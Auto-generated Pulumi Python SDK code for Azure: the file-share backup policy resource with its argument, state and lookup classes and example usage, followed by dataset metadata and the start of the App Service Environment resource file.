@pulumi.getter(name="recoveryVaultName")
def recovery_vault_name(self) -> pulumi.Input[str]:
"""
Specifies the name of the Recovery Services Vault to use. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "recovery_vault_name")
@recovery_vault_name.setter
def recovery_vault_name(self, value: pulumi.Input[str]):
pulumi.set(self, "recovery_vault_name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group in which to create the policy. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="retentionDaily")
def retention_daily(self) -> pulumi.Input['PolicyFileShareRetentionDailyArgs']:
"""
Configures the policy daily retention as documented in the `retention_daily` block below.
"""
return pulumi.get(self, "retention_daily")
@retention_daily.setter
def retention_daily(self, value: pulumi.Input['PolicyFileShareRetentionDailyArgs']):
pulumi.set(self, "retention_daily", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the policy. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="retentionMonthly")
def retention_monthly(self) -> Optional[pulumi.Input['PolicyFileShareRetentionMonthlyArgs']]:
"""
Configures the policy monthly retention as documented in the `retention_monthly` block below.
"""
return pulumi.get(self, "retention_monthly")
@retention_monthly.setter
def retention_monthly(self, value: Optional[pulumi.Input['PolicyFileShareRetentionMonthlyArgs']]):
pulumi.set(self, "retention_monthly", value)
@property
@pulumi.getter(name="retentionWeekly")
def retention_weekly(self) -> Optional[pulumi.Input['PolicyFileShareRetentionWeeklyArgs']]:
"""
Configures the policy weekly retention as documented in the `retention_weekly` block below.
"""
return pulumi.get(self, "retention_weekly")
@retention_weekly.setter
def retention_weekly(self, value: Optional[pulumi.Input['PolicyFileShareRetentionWeeklyArgs']]):
pulumi.set(self, "retention_weekly", value)
@property
@pulumi.getter(name="retentionYearly")
def retention_yearly(self) -> Optional[pulumi.Input['PolicyFileShareRetentionYearlyArgs']]:
"""
Configures the policy yearly retention as documented in the `retention_yearly` block below.
"""
return pulumi.get(self, "retention_yearly")
@retention_yearly.setter
def retention_yearly(self, value: Optional[pulumi.Input['PolicyFileShareRetentionYearlyArgs']]):
pulumi.set(self, "retention_yearly", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def timezone(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the timezone. [the possible values are defined here](http://jackstromberg.com/2017/01/list-of-time-zones-consumed-by-azure/). Defaults to `UTC`
"""
return pulumi.get(self, "timezone")
@timezone.setter
def timezone(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "timezone", value)
@pulumi.input_type
class _PolicyFileShareState:
def __init__(__self__, *,
backup: Optional[pulumi.Input['PolicyFileShareBackupArgs']] = None,
name: Optional[pulumi.Input[str]] = None,
recovery_vault_name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
retention_daily: Optional[pulumi.Input['PolicyFileShareRetentionDailyArgs']] = None,
retention_monthly: Optional[pulumi.Input['PolicyFileShareRetentionMonthlyArgs']] = None,
retention_weekly: Optional[pulumi.Input['PolicyFileShareRetentionWeeklyArgs']] = None,
retention_yearly: Optional[pulumi.Input['PolicyFileShareRetentionYearlyArgs']] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
timezone: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering PolicyFileShare resources.
:param pulumi.Input['PolicyFileShareBackupArgs'] backup: Configures the Policy backup frequency and times as documented in the `backup` block below.
:param pulumi.Input[str] name: Specifies the name of the policy. Changing this forces a new resource to be created.
:param pulumi.Input[str] recovery_vault_name: Specifies the name of the Recovery Services Vault to use. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the policy. Changing this forces a new resource to be created.
:param pulumi.Input['PolicyFileShareRetentionDailyArgs'] retention_daily: Configures the policy daily retention as documented in the `retention_daily` block below.
:param pulumi.Input['PolicyFileShareRetentionMonthlyArgs'] retention_monthly: Configures the policy monthly retention as documented in the `retention_monthly` block below.
:param pulumi.Input['PolicyFileShareRetentionWeeklyArgs'] retention_weekly: Configures the policy weekly retention as documented in the `retention_weekly` block below.
:param pulumi.Input['PolicyFileShareRetentionYearlyArgs'] retention_yearly: Configures the policy yearly retention as documented in the `retention_yearly` block below.
:param pulumi.Input[str] timezone: Specifies the timezone. [the possible values are defined here](http://jackstromberg.com/2017/01/list-of-time-zones-consumed-by-azure/). Defaults to `UTC`
"""
if backup is not None:
pulumi.set(__self__, "backup", backup)
if name is not None:
pulumi.set(__self__, "name", name)
if recovery_vault_name is not None:
pulumi.set(__self__, "recovery_vault_name", recovery_vault_name)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if retention_daily is not None:
pulumi.set(__self__, "retention_daily", retention_daily)
if retention_monthly is not None:
pulumi.set(__self__, "retention_monthly", retention_monthly)
if retention_weekly is not None:
pulumi.set(__self__, "retention_weekly", retention_weekly)
if retention_yearly is not None:
pulumi.set(__self__, "retention_yearly", retention_yearly)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if timezone is not None:
pulumi.set(__self__, "timezone", timezone)
@property
@pulumi.getter
def backup(self) -> Optional[pulumi.Input['PolicyFileShareBackupArgs']]:
"""
Configures the Policy backup frequency and times as documented in the `backup` block below.
"""
return pulumi.get(self, "backup")
@backup.setter
def backup(self, value: Optional[pulumi.Input['PolicyFileShareBackupArgs']]):
pulumi.set(self, "backup", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the policy. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="recoveryVaultName")
def recovery_vault_name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Recovery Services Vault to use. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "recovery_vault_name")
@recovery_vault_name.setter
def recovery_vault_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "recovery_vault_name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource group in which to create the policy. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="retentionDaily")
def retention_daily(self) -> Optional[pulumi.Input['PolicyFileShareRetentionDailyArgs']]:
"""
Configures the policy daily retention as documented in the `retention_daily` block below.
"""
return pulumi.get(self, "retention_daily")
@retention_daily.setter
def retention_daily(self, value: Optional[pulumi.Input['PolicyFileShareRetentionDailyArgs']]):
pulumi.set(self, "retention_daily", value)
@property
@pulumi.getter(name="retentionMonthly")
def retention_monthly(self) -> Optional[pulumi.Input['PolicyFileShareRetentionMonthlyArgs']]:
"""
Configures the policy monthly retention as documented in the `retention_monthly` block below.
"""
return pulumi.get(self, "retention_monthly")
@retention_monthly.setter
def retention_monthly(self, value: Optional[pulumi.Input['PolicyFileShareRetentionMonthlyArgs']]):
pulumi.set(self, "retention_monthly", value)
@property
@pulumi.getter(name="retentionWeekly")
def retention_weekly(self) -> Optional[pulumi.Input['PolicyFileShareRetentionWeeklyArgs']]:
"""
Configures the policy weekly retention as documented in the `retention_weekly` block below.
"""
return pulumi.get(self, "retention_weekly")
@retention_weekly.setter
def retention_weekly(self, value: Optional[pulumi.Input['PolicyFileShareRetentionWeeklyArgs']]):
pulumi.set(self, "retention_weekly", value)
@property
@pulumi.getter(name="retentionYearly")
def retention_yearly(self) -> Optional[pulumi.Input['PolicyFileShareRetentionYearlyArgs']]:
"""
Configures the policy yearly retention as documented in the `retention_yearly` block below.
"""
return pulumi.get(self, "retention_yearly")
@retention_yearly.setter
def retention_yearly(self, value: Optional[pulumi.Input['PolicyFileShareRetentionYearlyArgs']]):
pulumi.set(self, "retention_yearly", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def timezone(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the timezone. [the possible values are defined here](http://jackstromberg.com/2017/01/list-of-time-zones-consumed-by-azure/). Defaults to `UTC`
"""
return pulumi.get(self, "timezone")
@timezone.setter
def timezone(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "timezone", value)
class PolicyFileShare(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
backup: Optional[pulumi.Input[pulumi.InputType['PolicyFileShareBackupArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
recovery_vault_name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
retention_daily: Optional[pulumi.Input[pulumi.InputType['PolicyFileShareRetentionDailyArgs']]] = None,
retention_monthly: Optional[pulumi.Input[pulumi.InputType['PolicyFileShareRetentionMonthlyArgs']]] = None,
retention_weekly: Optional[pulumi.Input[pulumi.InputType['PolicyFileShareRetentionWeeklyArgs']]] = None,
retention_yearly: Optional[pulumi.Input[pulumi.InputType['PolicyFileShareRetentionYearlyArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
timezone: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages an Azure File Share Backup Policy within a Recovery Services vault.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_vault = azure.recoveryservices.Vault("exampleVault",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
sku="Standard")
policy = azure.backup.PolicyFileShare("policy",
resource_group_name=example_resource_group.name,
recovery_vault_name=azurerm_recovery_services_vault["vault"]["name"],
timezone="UTC",
backup=azure.backup.PolicyFileShareBackupArgs(
frequency="Daily",
time="23:00",
),
retention_daily=azure.backup.PolicyFileShareRetentionDailyArgs(
count=10,
),
retention_weekly=azure.backup.PolicyFileShareRetentionWeeklyArgs(
count=7,
weekdays=[
"Sunday",
"Wednesday",
"Friday",
"Saturday",
],
),
retention_monthly=azure.backup.PolicyFileShareRetentionMonthlyArgs(
count=7,
weekdays=[
"Sunday",
"Wednesday",
],
weeks=[
"First",
"Last",
],
),
retention_yearly=azure.backup.PolicyFileShareRetentionYearlyArgs(
count=7,
weekdays=["Sunday"],
weeks=["Last"],
months=["January"],
))
```
## Import
Azure File Share Backup Policies can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:backup/policyFileShare:PolicyFileShare policy1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.RecoveryServices/vaults/example-recovery-vault/backupPolicies/policy1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['PolicyFileShareBackupArgs']] backup: Configures the Policy backup frequency and times as documented in the `backup` block below.
:param pulumi.Input[str] name: Specifies the name of the policy. Changing this forces a new resource to be created.
:param pulumi.Input[str] recovery_vault_name: Specifies the name of the Recovery Services Vault to use. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the policy. Changing this forces a new resource to be created.
:param pulumi.Input[pulumi.InputType['PolicyFileShareRetentionDailyArgs']] retention_daily: Configures the policy daily retention as documented in the `retention_daily` block below.
:param pulumi.Input[pulumi.InputType['PolicyFileShareRetentionMonthlyArgs']] retention_monthly: Configures the policy monthly retention as documented in the `retention_monthly` block below.
:param pulumi.Input[pulumi.InputType['PolicyFileShareRetentionWeeklyArgs']] retention_weekly: Configures the policy weekly retention as documented in the `retention_weekly` block below.
:param pulumi.Input[pulumi.InputType['PolicyFileShareRetentionYearlyArgs']] retention_yearly: Configures the policy yearly retention as documented in the `retention_yearly` block below.
:param pulumi.Input[str] timezone: Specifies the timezone. [The possible values are defined here](http://jackstromberg.com/2017/01/list-of-time-zones-consumed-by-azure/). Defaults to `UTC`.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: PolicyFileShareArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages an Azure File Share Backup Policy within a Recovery Services vault.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_vault = azure.recoveryservices.Vault("exampleVault",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
sku="Standard")
policy = azure.backup.PolicyFileShare("policy",
resource_group_name=example_resource_group.name,
recovery_vault_name=example_vault.name,
timezone="UTC",
backup=azure.backup.PolicyFileShareBackupArgs(
frequency="Daily",
time="23:00",
),
retention_daily=azure.backup.PolicyFileShareRetentionDailyArgs(
count=10,
),
retention_weekly=azure.backup.PolicyFileShareRetentionWeeklyArgs(
count=7,
weekdays=[
"Sunday",
"Wednesday",
"Friday",
"Saturday",
],
),
retention_monthly=azure.backup.PolicyFileShareRetentionMonthlyArgs(
count=7,
weekdays=[
"Sunday",
"Wednesday",
],
weeks=[
"First",
"Last",
],
),
retention_yearly=azure.backup.PolicyFileShareRetentionYearlyArgs(
count=7,
weekdays=["Sunday"],
weeks=["Last"],
months=["January"],
))
```
## Import
Azure File Share Backup Policies can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:backup/policyFileShare:PolicyFileShare policy1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.RecoveryServices/vaults/example-recovery-vault/backupPolicies/policy1
```
:param str resource_name: The name of the resource.
:param PolicyFileShareArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(PolicyFileShareArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
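    # A minimal construction sketch (hypothetical names and values): the overloads above
    # accept either a single `PolicyFileShareArgs` object or the equivalent keyword arguments.
    #
    #     by_args = PolicyFileShare("policy-a", PolicyFileShareArgs(
    #         resource_group_name="example-rg",
    #         recovery_vault_name="example-vault",
    #         backup=PolicyFileShareBackupArgs(frequency="Daily", time="23:00"),
    #         retention_daily=PolicyFileShareRetentionDailyArgs(count=10)))
    #
    #     by_kwargs = PolicyFileShare("policy-b",
    #         resource_group_name="example-rg",
    #         recovery_vault_name="example-vault",
    #         backup=PolicyFileShareBackupArgs(frequency="Daily", time="23:00"),
    #         retention_daily=PolicyFileShareRetentionDailyArgs(count=10))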
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
backup: Optional[pulumi.Input[pulumi.InputType['PolicyFileShareBackupArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
recovery_vault_name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
retention_daily: Optional[pulumi.Input[pulumi.InputType['PolicyFileShareRetentionDailyArgs']]] = None,
retention_monthly: Optional[pulumi.Input[pulumi.InputType['PolicyFileShareRetentionMonthlyArgs']]] = None,
retention_weekly: Optional[pulumi.Input[pulumi.InputType['PolicyFileShareRetentionWeeklyArgs']]] = None,
retention_yearly: Optional[pulumi.Input[pulumi.InputType['PolicyFileShareRetentionYearlyArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
timezone: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = PolicyFileShareArgs.__new__(PolicyFileShareArgs)
if backup is None and not opts.urn:
raise TypeError("Missing required property 'backup'")
__props__.__dict__["backup"] = backup
__props__.__dict__["name"] = name
if recovery_vault_name is None and not opts.urn:
raise TypeError("Missing required property 'recovery_vault_name'")
__props__.__dict__["recovery_vault_name"] = recovery_vault_name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if retention_daily is None and not opts.urn:
raise TypeError("Missing required property 'retention_daily'")
__props__.__dict__["retention_daily"] = retention_daily
__props__.__dict__["retention_monthly"] = retention_monthly
__props__.__dict__["retention_weekly"] = retention_weekly
__props__.__dict__["retention_yearly"] = retention_yearly
__props__.__dict__["tags"] = tags
__props__.__dict__["timezone"] = timezone
super(PolicyFileShare, __self__).__init__(
'azure:backup/policyFileShare:PolicyFileShare',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
backup: Optional[pulumi.Input[pulumi.InputType['PolicyFileShareBackupArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
recovery_vault_name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
retention_daily: Optional[pulumi.Input[pulumi.InputType['PolicyFileShareRetentionDailyArgs']]] = None,
retention_monthly: Optional[pulumi.Input[pulumi.InputType['PolicyFileShareRetentionMonthlyArgs']]] = None,
retention_weekly: Optional[pulumi.Input[pulumi.InputType['PolicyFileShareRetentionWeeklyArgs']]] = None,
retention_yearly: Optional[pulumi.Input[pulumi.InputType['PolicyFileShareRetentionYearlyArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
timezone: Optional[pulumi.Input[str]] = None) -> 'PolicyFileShare':
"""
Get an existing PolicyFileShare resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['PolicyFileShareBackupArgs']] backup: Configures the Policy backup frequency and times as documented in the `backup` block below.
:param pulumi.Input[str] name: Specifies the name of the policy. Changing this forces a new resource to be created.
:param pulumi.Input[str] recovery_vault_name: Specifies the name of the Recovery Services Vault to use. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the policy. Changing this forces a new resource to be created.
:param pulumi.Input[pulumi.InputType['PolicyFileShareRetentionDailyArgs']] retention_daily: Configures the policy daily retention as documented in the `retention_daily` block below.
:param pulumi.Input[pulumi.InputType['PolicyFileShareRetentionMonthlyArgs']] retention_monthly: Configures the policy monthly retention as documented in the `retention_monthly` block below.
:param pulumi.Input[pulumi.InputType['PolicyFileShareRetentionWeeklyArgs']] retention_weekly: Configures the policy weekly retention as documented in the `retention_weekly` block below.
:param pulumi.Input[pulumi.InputType['PolicyFileShareRetentionYearlyArgs']] retention_yearly: Configures the policy yearly retention as documented in the `retention_yearly` block below.
:param pulumi.Input[str] timezone: Specifies the timezone. [The possible values are defined here](http://jackstromberg.com/2017/01/list-of-time-zones-consumed-by-azure/). Defaults to `UTC`.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _PolicyFileShareState.__new__(_PolicyFileShareState)
__props__.__dict__["backup"] = backup
__props__.__dict__["name"] = name
__props__.__dict__["recovery_vault_name"] = recovery_vault_name
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["retention_daily"] = retention_daily
__props__.__dict__["retention_monthly"] = retention_monthly
__props__.__dict__["retention_weekly"] = retention_weekly
__props__.__dict__["retention_yearly"] = retention_yearly
__props__.__dict__["tags"] = tags
__props__.__dict__["timezone"] = timezone
return PolicyFileShare(resource_name, opts=opts, __props__=__props__)
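    # Lookup sketch (the resource ID below is a placeholder): `get` adopts existing state
    # instead of creating a new policy, so only `resource_name` and `id` are required.
    #
    #     existing = PolicyFileShare.get(
    #         "existing-policy",
    #         id="/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1"
    #            "/providers/Microsoft.RecoveryServices/vaults/example-recovery-vault/backupPolicies/policy1")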
@property
@pulumi.getter
def backup(self) -> pulumi.Output['outputs.PolicyFileShareBackup']:
"""
Configures the Policy backup frequency and times as documented in the `backup` block below.
"""
return pulumi.get(self, "backup")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the name of the policy. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="recoveryVaultName")
def recovery_vault_name(self) -> pulumi.Output[str]:
"""
Specifies the name of the Recovery Services Vault to use. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "recovery_vault_name")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the resource group in which to create the policy. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter(name="retentionDaily")
def retention_daily(self) -> pulumi.Output['outputs.PolicyFileShareRetentionDaily']:
"""
Configures the policy daily retention as documented in the `retention_daily` block below.
"""
return pulumi.get(self, "retention_daily")
@property
@pulumi.getter(name="retentionMonthly")
def retention_monthly(self) -> pulumi.Output[Optional['outputs.PolicyFileShareRetentionMonthly']]:
"""
Configures the policy monthly retention as documented in the `retention_monthly` block below.
"""
return pulumi.get(self, "retention_monthly")
@property
@pulumi.getter(name="retentionWeekly")
def retention_weekly(self) -> pulumi.Output[Optional['outputs.PolicyFileShareRetentionWeekly']]:
"""
Configures the policy weekly retention as documented in the `retention_weekly` block below.
"""
return pulumi.get(self, "retention_weekly")
@property
@pulumi.getter(name="retentionYearly")
def retention_yearly(self) -> pulumi.Output[Optional['outputs.PolicyFileShareRetentionYearly']]:
"""
Configures the policy yearly retention as documented in the `retention_yearly` block below.
"""
return pulumi.get(self, "retention_yearly")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
return pulumi.get(self, "tags")
@property
@pulumi.getter
def timezone(self) -> pulumi.Output[Optional[str]]:
"""
Specifies the timezone. [The possible values are defined here](http://jackstromberg.com/2017/01/list-of-time-zones-consumed-by-azure/). Defaults to `UTC`.
"""
return pulumi.get(self, "timezone")
| 50.591176
| 241
| 0.672781
| 3,660
| 34,402
| 6.128962
| 0.063661
| 0.068162
| 0.066066
| 0.026525
| 0.905492
| 0.892475
| 0.884629
| 0.874287
| 0.865148
| 0.84638
| 0
| 0.004949
| 0.230568
| 34,402
| 679
| 242
| 50.665685
| 0.842501
| 0.386082
| 0
| 0.756374
| 1
| 0
| 0.179748
| 0.089431
| 0
| 0
| 0
| 0
| 0
| 1
| 0.161473
| false
| 0.002833
| 0.01983
| 0.008499
| 0.27762
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
813f9a86840c786caa2576cc9ba00bb164f5ec41
| 40,752
|
py
|
Python
|
sdk/python/pulumi_azure/appservice/environment.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2018-06-18T00:19:44.000Z
|
2022-02-20T05:32:57.000Z
|
sdk/python/pulumi_azure/appservice/environment.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 663
|
2018-06-18T21:08:46.000Z
|
2022-03-31T20:10:11.000Z
|
sdk/python/pulumi_azure/appservice/environment.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2018-07-19T22:37:38.000Z
|
2022-03-14T10:56:26.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['EnvironmentArgs', 'Environment']
@pulumi.input_type
class EnvironmentArgs:
def __init__(__self__, *,
subnet_id: pulumi.Input[str],
allowed_user_ip_cidrs: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
cluster_settings: Optional[pulumi.Input[Sequence[pulumi.Input['EnvironmentClusterSettingArgs']]]] = None,
front_end_scale_factor: Optional[pulumi.Input[int]] = None,
internal_load_balancing_mode: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
pricing_tier: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
user_whitelisted_ip_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing an Environment resource.
:param pulumi.Input[str] subnet_id: The ID of the Subnet which the App Service Environment should be connected to. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] allowed_user_ip_cidrs: Allowed user added IP ranges on the ASE database. Use the addresses you want to set as the explicit egress address ranges.
:param pulumi.Input[Sequence[pulumi.Input['EnvironmentClusterSettingArgs']]] cluster_settings: Zero or more `cluster_setting` blocks as defined below.
:param pulumi.Input[int] front_end_scale_factor: Scale factor for front end instances. Possible values are between `5` and `15`. Defaults to `15`.
:param pulumi.Input[str] internal_load_balancing_mode: Specifies which endpoints to serve internally in the Virtual Network for the App Service Environment. Possible values are `None`, `Web`, `Publishing` and combined value `"Web, Publishing"`. Defaults to `None`.
:param pulumi.Input[str] name: The name of the App Service Environment. Changing this forces a new resource to be created.
:param pulumi.Input[str] pricing_tier: Pricing tier for the front end instances. Possible values are `I1`, `I2` and `I3`. Defaults to `I1`.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the App Service Environment exists. Defaults to the Resource Group of the Subnet (specified by `subnet_id`).
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "subnet_id", subnet_id)
if allowed_user_ip_cidrs is not None:
pulumi.set(__self__, "allowed_user_ip_cidrs", allowed_user_ip_cidrs)
if cluster_settings is not None:
pulumi.set(__self__, "cluster_settings", cluster_settings)
if front_end_scale_factor is not None:
pulumi.set(__self__, "front_end_scale_factor", front_end_scale_factor)
if internal_load_balancing_mode is not None:
pulumi.set(__self__, "internal_load_balancing_mode", internal_load_balancing_mode)
if name is not None:
pulumi.set(__self__, "name", name)
if pricing_tier is not None:
pulumi.set(__self__, "pricing_tier", pricing_tier)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if user_whitelisted_ip_ranges is not None:
    warnings.warn("""this property has been renamed to `allowed_user_ip_cidrs` to better reflect the expected IP range format""", DeprecationWarning)
    pulumi.log.warn("""user_whitelisted_ip_ranges is deprecated: this property has been renamed to `allowed_user_ip_cidrs` to better reflect the expected IP range format""")
    pulumi.set(__self__, "user_whitelisted_ip_ranges", user_whitelisted_ip_ranges)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> pulumi.Input[str]:
"""
The ID of the Subnet which the App Service Environment should be connected to. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: pulumi.Input[str]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="allowedUserIpCidrs")
def allowed_user_ip_cidrs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Allowed user added IP ranges on the ASE database. Use the addresses you want to set as the explicit egress address ranges.
"""
return pulumi.get(self, "allowed_user_ip_cidrs")
@allowed_user_ip_cidrs.setter
def allowed_user_ip_cidrs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "allowed_user_ip_cidrs", value)
@property
@pulumi.getter(name="clusterSettings")
def cluster_settings(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['EnvironmentClusterSettingArgs']]]]:
"""
Zero or more `cluster_setting` blocks as defined below.
"""
return pulumi.get(self, "cluster_settings")
@cluster_settings.setter
def cluster_settings(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['EnvironmentClusterSettingArgs']]]]):
pulumi.set(self, "cluster_settings", value)
@property
@pulumi.getter(name="frontEndScaleFactor")
def front_end_scale_factor(self) -> Optional[pulumi.Input[int]]:
"""
Scale factor for front end instances. Possible values are between `5` and `15`. Defaults to `15`.
"""
return pulumi.get(self, "front_end_scale_factor")
@front_end_scale_factor.setter
def front_end_scale_factor(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "front_end_scale_factor", value)
@property
@pulumi.getter(name="internalLoadBalancingMode")
